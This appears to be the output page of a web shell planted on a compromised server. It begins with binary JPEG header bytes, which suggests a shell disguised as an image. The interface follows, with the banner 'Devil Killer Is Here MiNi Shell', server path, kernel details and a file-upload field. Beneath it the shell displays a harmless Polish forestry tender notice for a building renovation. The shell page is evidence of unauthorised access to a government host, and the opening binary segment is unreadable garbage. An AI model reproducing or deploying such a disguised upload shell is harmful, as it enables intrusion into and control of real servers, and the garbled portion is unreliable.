JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231228/0057653301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa i remont budynku warsztatowo-socjalnego o nr inw. 103/602 – V postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Jastrowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570064398</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Roosevelta 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jastrowie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-915</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">672662361</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">jastrowie@pila.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://jastrowie.pila.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Jastrowie </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka Leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa i remont budynku warsztatowo-socjalnego o nr inw. 103/602 – V postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ed737b65-a57c-11ee-948d-82b0c04ef850</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00576533</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00282079/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa i remont budynku warsztatowo-socjalnego o nr inw. 103/602</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.pila.lasy.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.pila.lasy.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawcami odbywa się drogą elektroniczną za pośrednictwem Platformy eZamawiający - https://zamowienia.pila.lasy.gov.pl/ lub poczty elektronicznej –jastrowie@pila.lasy.gov.pl..<br/>Oświadczenia, wnioski, zawiadomienia, odwołania oraz informacje Zamawiający i Wykonawcy przekazują za pośrednictwem Platformy eZamawiający pod adresem internetowym: https://zamowienia.pila.lasy.gov.pl/ lub przy pomocy poczty elektronicznej.<br/>Wszelkie oświadczenia, wnioski, zawiadomienia, odwołania oraz informacje,<br/>przekazywane za pomocą poczty elektronicznej muszą zawierać w tytule wiadomości numer referencyjny sprawy, której ona dotyczy SA.270.1.14.2023. Ogólne zasady korzystania z Platformy:<br/>1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu<br/>na subdomenie Regionalnej Dyrekcji Lasów Państwowych w Pile pod adresem<br/>internetowym Platforma eZamawiający - https://zamowienia.pila.lasy.gov.pl/<br/>lub Platforma Zakupowa Marketplanet https://oneplace.marketplanet.pl.<br/>2) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany<br/>do strony Platforma Zakupowa Marketplanet https://oneplace.marketplanet.pl/, gdzie<br/>zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta.<br/>Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego: podaje adres<br/>e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”; 3) rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym<br/>Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację<br/>w procesie złożenia Oferty w postaci elektronicznej. Wykonawca wraz<br/>z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości<br/>przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod<br/>numerem telefonu podanym w ww. potwierdzeniu;<br/>4) po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu oraz<br/>sporządzania, wysyłania i odbierania korespondencji elektronicznej;<br/>5) Ofertę wraz z wymaganymi załącznikami składa się w postaci elektronicznej,<br/>opatrzonych kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym przez osoby umocowane, pod rygorem nieważności na Platformie<br/>eZamawiający pod adresem internetowym: https://zamowienia.pila.lasy.gov.pl/ w<br/>zakładce „Oferty”.<br/>6) korzystanie z Platformy eZamawiający jest bezpłatne.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz.<br/>Urz. UE L 119 z 04 maja 2016 r., str. 1 – dalej „RODO”) Zamawiający informuje, iż<br/>administratorem danych osobowych jest Nadleśnictwo Jastrowie<br/>Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie<br/>zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym<br/>rozpowszechnianiem.<br/>Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu<br/>umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale VI PZP, do<br/>upływu terminu do ich wniesienia.<br/>Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być<br/>dopuszczone wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do<br/>przetwarzania takich danych są obowiązane do zachowania ich w poufności.<br/>Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego<br/>rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art. 255-256 PZP<br/>– w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także<br/>udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja<br/>postępowania zostanie udostępniona w oparciu o przepisy PZP</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia publicznego będą przechowywane, zgodnie z art. 97 ust. 1 PZP, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas<br/>trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy<br/>w sprawie zamówienia publicznego.<br/>Niezależnie od postanowień pkt 19.7. powyżej, w przypadku zawarcia umowy w sprawie<br/>zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia<br/>roszczeń wynikających z umowy w sprawie zamówienia publicznego.<br/>Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia mogą zostać przekazane podmiotom świadczącym usługi doradcze, w tym usługi<br/>prawne i konsultingowe.<br/>Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w<br/>sposób zautomatyzowany.<br/>Osoba, której dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania dane<br/>osobowe, ma prawo:<br/>1) dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym w<br/>sytuacji, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1 -3 RODO<br/>wymagałoby niewspółmiernie dużego wysiłku Zamawiający może żądać wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania<br/>nazwy lub daty bieżącego bądź zakończonego postępowania o udzielenie zamówienia<br/>publicznego;<br/>2) do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy czym<br/>skorzystanie z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym<br/>mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego, ani zmianą postanowień umowy w zakresie niezgodnym z PZP oraz<br/>nie może naruszać integralności protokołu oraz jego załączników; 3) do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu<br/>ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego; prawo to nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/>zamówienia publicznego;<br/>4) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku<br/>uznania, iż przetwarzanie jej danych osobowych narusza przepisy o ochronie danych<br/>osobowych, w tym przepisy RODO.<br/>Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w<br/>przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych określa PZP.<br/>Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego nie<br/>przysługuje:<br/>1) prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e<br/>RODO,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>określone w art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, a to z<br/>uwagi na fakt, że podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO.<br/>Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub<br/>innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania<br/>realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej, w<br/>szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego.<br/>Dane osobowe są przekazywane do podmiotów przetwarzających dane w imieniu<br/>administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.1.17.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: „Przebudowa i remont budynku warsztatowosocjalnego<br/>o nr inw. 103/602 – V postępowanie”<br/>2. Szczegółowy opis przedmiotu zamówienia zamieszczono w Załącznikach nr 5,6 oraz 10 do<br/>SWZ, na które składają się:<br/>- przedmiar robót zał. nr 5,<br/>- Specyfikacja Techniczna Wykonania i Odbioru Robót zał. nr 6,<br/>- dokumentacja projektowa zał. nr 10,<br/>- w związku z prowadzonymi pracami rozbiórkowymi Zamawiający wymaga<br/>dokonania uzgodnień materiałów które będą podlegały utylizacji takich jak: bramy<br/>garażowe w celu innego zagospodarowania pozyskanych materiałów rozbiórkowych.<br/>3. Jeżeli specyfikacja techniczna wykonania i odbioru robót budowlanych wskazywałyby<br/>w odniesieniu do niektórych materiałów lub urządzeń znaki towarowe, patenty lub<br/>pochodzenie - Zamawiający, zgodnie z art. 99 ust. 5 i 6ustawy Pzp, dopuszcza oferowanie<br/>materiałów lub urządzeń równoważnych. Materiały lub urządzenia pochodzące<br/>od konkretnych producentów określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać materiały lub urządzenia oferowane przez<br/>Wykonawcę, aby zostały spełnione wymagania stawiane przez Zamawiającego. Materiały<br/>lub urządzenia pochodzące od konkretnych producentów stanowią wyłącznie wzorzec<br/>jakościowy przedmiotu zamówienia. Pod pojęciem „minimalne parametry jakościowe<br/>i cechy użytkowe” Zamawiający rozumie wymagania dotyczące materiałów lub urządzeń<br/>zawarte w ogólnie dostępnych źródłach, katalogach, stronach internetowych producentów.<br/>Operowanie przykładowymi nazwami producenta ma jedynie na celu doprecyzowanie<br/>poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania.<br/>Posługiwanie się nazwami producentów/produktów ma wyłącznie charakter przykładowy.<br/>Zamawiający, wskazując oznaczenie konkretnego producenta (dostawcy) lub konkretny<br/>produkt przy opisie przedmiotu zamówienia, dopuszcza jednocześnie produkty<br/>równoważne o parametrach jakościowych i cechach użytkowych co najmniej na poziomie<br/>parametrów wskazanego produktu, uznając tym samym każdy produkt o wskazanych lub<br/>lepszych parametrach. W takiej sytuacji Zamawiający wymaga złożenia stosownych<br/>dokumentów, uwiarygodniających te materiały lub urządzenia. Zamawiający zastrzega<br/>sobie prawo wystąpienia do autora dokumentacji o opinię na temat oferowanych<br/>materiałów lub urządzeń. Opinia ta może stanowić podstawę do podjęcia przez<br/>Zamawiającego decyzji o przyjęciu materiałów lub urządzeń równoważnych albo<br/>odrzuceniu oferty z powodu braku równoważności. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <p class="mb-0">35125300-2 - Kamery bezpieczeństwa</p> <p class="mb-0">39717200-3 - Urządzenia klimatyzacyjne</p> <p class="mb-0">45331220-4 - Instalowanie urządzeń klimatyzacyjnych</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te oferty, które:<br/>1) zostaną złożone przez wykonawców niewykluczonych przez Zamawiającego<br/>z niniejszego postępowania,<br/>2) nie zostaną odrzucone przez Zamawiającego.<br/>2. Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi<br/>kryteriami wyboru oferty: 2. Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi<br/>kryteriami wyboru oferty:<br/>1 Cena brutto za wykonanie zamówienia (C) 60%<br/>2 Gwarancja na roboty budowlane 40%<br/>3. W kryterium ceny ocenie poddana zostanie cena oferty brutto podana w „Formularzu<br/>ofertowym” (wg wzoru zał. nr 1 do SWZ).<br/>Przyznawanie liczby punktów poszczególnym ofertom odbywać się będzie<br/>wg wzoru opisanego w SWZ. Maksymalna liczba punktów, jaką można uzyskać w powyższym kryterium: 60 punktów.<br/>4. W kryterium gwarancja zamówienia ocenie poddany zostanie czas w jakim Wykonawca<br/>zadeklaruje poszerzenie gwarancji na przedmiot zmówienia.<br/>Punkty zostaną przyznane, w zależności od czasu zaoferowanego przez Wykonawcę<br/>w następujący sposób:<br/>a. jeżeli Wykonawca zadeklaruje gwarancję w wymiarze 2 lat otrzyma 0 pkt.;<br/>c. jeżeli Wykonawca zadeklaruje gwarancję 4 lat otrzyma 20 pkt.<br/>d. jeżeli Wykonawca zadeklaruje gwarancję 5 lat otrzyma 30 pkt.<br/>e. jeżeli Wykonawca zadeklaruje gwarancję 6 lat lub dłużej otrzyma 40 pkt.<br/>Maksymalna liczba punktów, jaką można uzyskać w powyższym kryterium: 40 punktów.<br/>5. Zamawiający informuje, iż w sytuacji w której Wykonawca nie wskaże<br/>w formularzu ofertowym terminu gwarancji, Zamawiający do oceny oferty, przyjmie okres gwarancji 2 lat – za co Wykonawca otrzyma 0 pkt.<br/>6. Łączna punktacja oferty stanowi sumę punków uzyskanych przez daną ofertę w poszczególnych kryteriach wyboru. Maksymalna liczba punktów przyznana ofercie może wynosić 100,00 pkt.<br/>7. Ocenie w oparciu o ww. kryteria wyboru oferty poddane będą wyłącznie oferty nie podlegające odrzuceniu.<br/>8. Zamawiający udzieli zamówienia Wykonawcy, którego oferta nie podlega odrzuceniu i uzyska najwyższą liczbę punktów.<br/>9. W toku oceny ofert Zamawiający zastosuje zaokrąglenie wszystkich wyników do dwóch<br/>miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału<br/>w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia w tym zakresie żadnych wymagań.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia w tym zakresie żadnych wymagań.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku<br/>udziału w postępowaniu w odniesieniu do warunku dot. zdolności ekonomicznej.<br/>Warunek w odniesieniu do sytuacji finansowej, zostanie spełniony, jeśli Wykonawca<br/>wykaże, że posiada środki finansowe lub zdolność kredytową nie mniejszą niż: 300.000,00<br/>zł,<br/>Na potwierdzenie spełnienia przedmiotowego wymogu Wykonawca przedłoży informację z<br/>banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość<br/>posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie<br/>wcześniejszym 